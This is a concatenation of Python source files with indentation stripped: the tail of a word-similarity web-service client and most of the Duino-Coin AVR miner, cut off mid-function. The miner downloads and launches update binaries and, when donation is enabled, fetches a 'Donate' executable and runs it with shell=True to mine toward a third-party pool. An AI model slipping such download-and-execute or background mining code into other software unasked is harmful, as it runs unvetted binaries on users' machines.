scoreDictionary['swoogle'] = 0
# 1 - EasyESA client
# a score of 1 and -1 results in a perfect match
# treshold values to consider 0.07, 0.052 and 0.04
def getEasyESAScore(word1,word2):
WordSimilarity.scoreDictionary['esa'] = 0
url = "http://vmdeb20.deri.ie:8890/esaservice?task=esa&term1="+quote(word1)+'&term2='+quote(word2)
try:
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
score = str(response.read().decode('utf-8')).replace('\"','')
WordSimilarity.scoreDictionary['esa'] = float(score)
except Exception as e:
WordSimilarity.scoreDictionary['esa'] = 0
# 2 - ws4j client
def getWs4jScore(word1,word2):
url = "http://ws4jdemo.appspot.com/ws4j?measure=wup&args="+quote(word1)+"%3A%3A"+quote(word2)
request = urllib.request.Request(url)
request.add_header('Accept', 'application/json')
response = urllib.request.urlopen(request)
responseStr = response.read().decode('utf-8')
# fetch json from the response
jsonStr = json.loads(responseStr)
score = float(jsonStr['result'][0]['score'])
return score
# 3 - UMBC Semantic Similarity service
#
# Documentation availabel at http://swoogle.umbc.edu/SimService/api.html
def getSwoogleScore(word1,word2):
WordSimilarity.scoreDictionary['swoogle'] = 0
url = "http://swoogle.umbc.edu/StsService/GetStsSim?operation=api&phrase1="+quote(word1)+'&phrase2='+quote(word2)
try:
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
score = str(response.read().decode('utf-8')).replace('\"','')
score = float(score)
WordSimilarity.scoreDictionary['swoogle'] = score
except Exception as e:
WordSimilarity.scoreDictionary['swoogle'] = 0
# As of now using only EasyESA.
# call the method 2 ws4j client if needed
# a score of 1 and -1 results in a perfect match
# treshold values to consider 0.07, 0.052 and 0.04
def isPredicateSimilar(word1,word2):
#score = math.fabs(WordSimilarity.getEasyESAScore(word1,word2))
esaThread = Thread(target=WordSimilarity.getEasyESAScore, args=(word1,word2,))
swoogleThread = Thread(target=WordSimilarity.getSwoogleScore, args=(word1,word2,))
esaThread.start()
swoogleThread.start()
esaThread.join()
swoogleThread.join()
ESAscore = WordSimilarity.scoreDictionary['esa']
#WordSimilarity.getEasyESAScore(word1,word2)
ESAScaledScore = 0
if(ESAscore>0 and ESAscore<=0.04):
ESAScaledScore = 1
elif(ESAscore>0.04 and ESAscore<=0.06):
ESAScaledScore = 2
elif(ESAscore>0.07):
ESAScaledScore = 3
else:
ESAScaledScore = 0
SwoogleScore = WordSimilarity.scoreDictionary['swoogle']
# WordSimilarity.getSwoogleScore(word1,word2)
SwoogleScaledScore = 0
if(SwoogleScore>0 and SwoogleScore<0.6):
SwoogleScaledScore = 1
elif(SwoogleScore>=0.6 and SwoogleScore<0.7):
SwoogleScaledScore = 2
elif(SwoogleScore>=0.7):
SwoogleScaledScore = 3
else:
SwoogleScaledScore = 0
if(ESAScaledScore>SwoogleScaledScore):
score = ESAScaledScore
else:
score = SwoogleScaledScore
if(score>=2):
return score
else:
return -1
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 3.1 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2022
"""
from os import _exit, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
import json
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
import zipfile
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread
from threading import Lock as thread_lock
from threading import Semaphore
import base64 as b64
import os
import psutil
printlock = Semaphore(value=1)
# Python <3.5 check
f"Your Python version is too old. Duino-Coin Miner requires version 3.6 or above. Update your packages and try again"
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
class Settings:
VER = '3.1'
SOC_TIMEOUT = 15
REPORT_TIME = 120
AVR_TIMEOUT = 7 # diff 16 * 100 / 258 h/s = 6.2 s
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
TEMP_FOLDER = "Temp"
try:
# Raspberry Pi latin users can't display this character
"‖".encode(sys.stdout.encoding)
BLOCK = " ‖ "
except:
BLOCK = " | "
PICK = ""
COG = " @"
if (osname != "nt"
or bool(osname == "nt"
and os.environ.get("WT_SESSION"))):
# Windows' cmd does not support emojis, shame!
# And some codecs same, for example the Latin-1 encoding don`t support emoji
try:
"⛏ ⚙".encode(sys.stdout.encoding) # if the terminal support emoji
PICK = " ⛏"
COG = " ⚙"
except UnicodeEncodeError: # else
PICK = ""
COG = " @"
def check_updates():
"""
Function that checks if the miner is updated.
Downloads the new version and restarts the miner.
"""
try:
git_json = requests.get("https://api.github.com/repos/revoxhere/duino-coin/releases/latest")
data = json.loads(git_json.text) # Get latest version
zip_file = "Duino-Coin_" + data["tag_name"] + "_linux.zip"
if sys.platform == "win32":
zip_file = "Duino-Coin_" + data["tag_name"] + "_windows.zip"
process = psutil.Process(os.getpid())
running_script = False # If the process is from script
if "python" in process.name():
running_script = True
if float(Settings.VER) < float(data["tag_name"]): # If is outdated
update = input(Style.BRIGHT + get_string("new_version"))
if update == "Y" or update == "y":
pretty_print(get_string("updating"), "warning", "sys")
DATA_DIR = "Duino-Coin AVR Miner " + str(data["tag_name"]) # Create new version config folder
if not path.exists(DATA_DIR):
mkdir(DATA_DIR)
try :
config.read(str(Settings.DATA_DIR) + '/Settings.cfg') # read the previous config
config["AVR Miner"] = {
'username': config["AVR Miner"]['username'],
'avrport': config["AVR Miner"]['avrport'],
'donate': int(config["AVR Miner"]['donate']),
'language': config["AVR Miner"]['language'],
'identifier': config["AVR Miner"]['identifier'],
'debug': config["AVR Miner"]['debug'],
"soc_timeout": int(config["AVR Miner"]["soc_timeout"]),
"avr_timeout": float(config["AVR Miner"]["avr_timeout"]),
"discord_presence": config["AVR Miner"]["discord_presence"],
"periodic_report": int(config["AVR Miner"]["periodic_report"]),
"shuffle_ports": config["AVR Miner"]["shuffle_ports"],
"mining_key": config["AVR Miner"]["mining_key"]
}
with open(str(DATA_DIR) # save it on the new version folder
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
print(Style.RESET_ALL + get_string('config_saved'))
except Exception as e:
print(Style.BRIGHT + "There is a error trying to save the config file: " + str(e))
print("The config file isn't saved on the new version folder")
if not os.path.exists(Settings.TEMP_FOLDER): # Make the Temp folder
os.makedirs(Settings.TEMP_FOLDER)
file_path = os.path.join(Settings.TEMP_FOLDER, zip_file)
download_url = "https://github.com/revoxhere/duino-coin/releases/download/" + data["tag_name"] + "/" + zip_file
if running_script:
file_path = os.path.join(".", "AVR_Miner_"+data["tag_name"]+".py")
download_url = "https://raw.githubusercontent.com/revoxhere/duino-coin/master/AVR_Miner.py"
r = requests.get(download_url, stream=True)
if r.ok:
start = time()
dl = 0
file_size = int(r.headers["Content-Length"]) # Get file size
print("Saving to", os.path.abspath(file_path))
with open(file_path, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024 * 8): # Download file in chunks
if chunk:
dl += len(chunk)
done = int(50 * dl / file_size)
dl_perc = str(int(100 * dl / file_size))
if running_script:
done = int(12.5 * dl / file_size)
dl_perc = str(int(22.5 * dl / file_size))
sys.stdout.write(
"\r%s [%s%s] %s %s" % (
dl_perc + "%",
'#' * done,
' ' * (50-done),
str(round(os.path.getsize(file_path) / 1024 / 1024, 2)) + " MB ",
str((dl // (time() - start)) // 1024) + " KB/s")) # ProgressBar
sys.stdout.flush()
f.write(chunk)
f.flush()
os.fsync(f.fileno())
print("\nDownload complete!")
if not running_script:
print("Unpacking...")
with zipfile.ZipFile(file_path, 'r') as zip_ref: # Unzip the file
for file in zip_ref.infolist():
if "AVR_Miner" in file.filename:
if sys.platform == "win32":
file.filename = "AVR_Miner_"+data["tag_name"]+".exe" # Rename the file
else:
file.filename = "AVR_Miner_"+data["tag_name"]
zip_ref.extract(file, ".")
print("Unpacking complete!")
os.remove(file_path) # Delete the zip file
os.rmdir(Settings.TEMP_FOLDER) # Delete the temp folder
if sys.platform == "win32":
os.startfile(os.getcwd() + "\\AVR_Miner_"+data["tag_name"]+".exe") # Start the miner
else: # os.startfile is only for windows
os.system(os.getcwd() + "/AVR_Miner_"+data["tag_name"])
else:
if sys.platform == "win32":
os.system(file_path)
else:
os.system("python3 " + file_path)
sys.exit() # Exit the program
else: # HTTP status code 4XX/5XX
print("Download failed: status code {}\n{}".format(r.status_code, r.text))
else:
print("Update aborted!")
else:
print("The Miner is up to date")
except Exception as e:
print(e)
sys.exit()
def check_mining_key(user_settings):
user_settings = user_settings["AVR Miner"]
if user_settings["mining_key"] != "None":
key = b64.b64decode(user_settings["mining_key"]).decode('utf-8')
else:
key = ''
response = requests.get(
"https://server.duinocoin.com/mining_key"
+ "?u=" + user_settings["username"]
+ "&k=" + key,
timeout=10
).json()
if response["success"] and not response["has_key"]: # if the user doesn't have a mining key
user_settings["mining_key"] = "None"
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
return
if not response["success"]:
if user_settings["mining_key"] == "None":
pretty_print(
"sys0",
get_string("mining_key_required"),
"warning")
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
check_mining_key(config)
else:
pretty_print(
"sys0",
get_string("invalid_mining_key"),
"error")
retry = input("You want to retry? (y/n): ")
if retry == "y" or retry == "Y":
mining_key = input("Enter your mining key: ")
user_settings["mining_key"] = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
config["AVR Miner"] = user_settings
with open(Settings.DATA_DIR + '/Settings.cfg',
"w") as configfile:
config.write(configfile)
print("sys0",
Style.RESET_ALL + get_string("config_saved"),
"info")
sleep(1.5)
check_mining_key(config)
else:
return
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", get_string("connection_search"),
"info")
try:
response = requests.get(
"https://maxteal.github.io/getpool.html",
timeout=10).json()
if response["success"] == True:
pretty_print("net0", get_string("connecting_node")
+ response["name"],
"info")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
if "Expecting value" in str(e):
pretty_print("net0", get_string("node_picker_unavailable")
+ f"15s {Style.RESET_ALL}({e})",
"warning")
else:
pretty_print("net0", get_string("node_picker_error")
+ f"15s {Style.RESET_ALL}({e})",
"error")
sleep(15)
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url, timeout=15)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if osname == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*3}')
elif osname == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*3}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'error')
shares = [0, 0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url, timeout=5)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('de'):
lang = 'german'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('it'):
lang = 'italian'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
elif locale.startswith('az'):
lang = 'azerbaijani'
elif locale.startswith('nl'):
lang = 'dutch'
elif locale.startswith('ko'):
lang = 'korean'
elif locale.startswith("id"):
lang = "indonesian"
elif locale.startswith("cz"):
lang = "czech"
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
try:
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
except Exception as e:
print(e)
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global hashrate_list
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
mining_key = input(Style.RESET_ALL + Fore.YELLOW
+ get_string("ask_mining_key")
+ Fore.RESET + Style.BRIGHT)
if not mining_key:
mining_key = "None"
else:
mining_key = b64.b64encode(mining_key.encode("utf-8")).decode('utf-8')
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 7,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y",
"mining_key": mining_key}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
hashrate_list = [0] * len(avrport)
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = int(config["AVR Miner"]['donate'])
debug = config["AVR Miner"]['debug']
rig_identifier = config["AVR Miner"]['identifier']
Settings.SOC_TIMEOUT = int(config["AVR Miner"]["soc_timeout"])
Settings.AVR_TIMEOUT = float(config["AVR Miner"]["avr_timeout"])
discord_presence = config["AVR Miner"]["discord_presence"]
shuffle_ports = config["AVR Miner"]["shuffle_ports"]
Settings.REPORT_TIME = int(config["AVR Miner"]["periodic_report"])
hashrate_list = [0] * len(avrport)
def greeting():
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string('banner')
+ Style.RESET_ALL + Fore.MAGENTA
+ f' {Settings.VER}' + Fore.RESET
+ ' 2019-2022')
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL + Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + lang.capitalize()
+ " translation: " + Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('avr_on_port')
+ Style.BRIGHT + Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM + Fore.MAGENTA + Settings.BLOCK
+ Style.NORMAL + Fore.RESET
+ get_string('donation_level') + Style.BRIGHT
+ Fore.YELLOW + str(donation_level))
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('algorithm')
+ Style.BRIGHT + Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + get_string('rig_identifier')
+ Style.BRIGHT + Fore.YELLOW + rig_identifier)
print(
Style.DIM + Fore.MAGENTA
+ Settings.BLOCK + Style.NORMAL
+ Fore.RESET + str(greeting) + ', '
+ Style.BRIGHT + Fore.YELLOW
+ str(username) + '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(905158274490441808)
RPC.connect()
Thread(target=update_rich_presence).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
total_hashrate = get_prefix("H/s", sum(hashrate_list), 2)
RPC.update(details="Hashrate: " + str(total_hashrate),
start=mining_start_time,
state=str(shares[0]) + "/"
+ str(shares[0] + shares[1])
+ " accepted shares",
large_image="avrminer",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything"
+ ", including AVR boards",
buttons=[{"label": "Visit duinocoin.com",
"url": "https://duinocoin.com"},
{"label": "Join the Discord",
"url": "https://discord.gg/k48Ht5y"}])
except Exception as e:
print("Error updating Discord RPC thread: " + str(e))
sleep(15)
def pretty_print(sender: str = "sys0",
msg: str = None,
state: str = "success"):
"""
Produces nicely formatted CLI output for messages:
HH:MM:S |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("avr"):
bg_color = Back.MAGENTA
else:
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "info":
fg_color = Fore.BLUE
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ bg_color + Style.BRIGHT + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
def share_print(id, type, accept, reject, total_hashrate,
computetime, diff, ping, reject_cause=None):
"""
Produces nicely formatted CLI output for shares:
HH:MM:S |avrN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
try:
diff = get_prefix("", int(diff), 0)
except:
diff = "?"
try:
total_hashrate = get_prefix("H/s", total_hashrate, 2)
except:
total_hashrate = "? H/s"
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
if reject_cause:
share_str += f"{Style.NORMAL}({reject_cause}) "
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.MAGENTA
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool):
global hashrate
start_time = time()
report_shares = 0
last_report_share = 0
while True:
while True:
try:
ser.close()
pretty_print('sys' + port_num(com),
f"Closed COM port {com}", 'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=float(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: " + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
while True:
try:
if config["AVR Miner"]["mining_key"] != "None":
key = b64.b64decode(config["AVR Miner"]["mining_key"]).decode()
else:
key = config["AVR Miner"]["mining_key"]
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ 'AVR'
+ Settings.SEPARATOR
+ str(key)
)
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
retry_counter += 1
continue
if retry_counter > 3:
break
try:
computetime = round(int(result[1], 2) / 1000000, 3)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
hashrate_list[threadid] = hashrate
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(rig_identifier)
+ Settings.SEPARATOR
+ str(result[2]))
responsetimetart = now()
feedback = Client.recv(s, 64).split(",")
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {" ".join(feedback)}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
